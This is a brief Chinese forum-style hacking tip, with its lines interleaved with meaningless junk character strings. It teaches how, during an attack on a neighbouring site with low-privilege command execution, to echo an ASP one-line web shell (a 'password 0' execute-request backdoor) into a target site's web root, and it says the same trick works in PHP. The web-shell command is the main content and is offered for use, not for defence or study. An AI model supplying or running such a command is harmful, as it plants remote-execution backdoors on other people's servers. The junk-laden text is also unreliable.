在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
; S; ^0 q: w! A/ g9 A. k# T. k Q5 J! e: l) z
命令格式" f3 O. @( S5 K* P, }
* ^! b, O. o3 m) T6 AEcho 语句 >目标站绝对目录3 H+ C/ J' E* d* ~( X* \# V5 w
. `' d( z. X/ N4 H4 @例如:
# ?1 T2 L: [ V$ [# b3 G( S; t( s
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp5 x" [- e* C* I# j: L9 i
, Q% r6 J* M1 k/ X- v; |这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
( p8 t' _3 k' V0 N% O1 t u |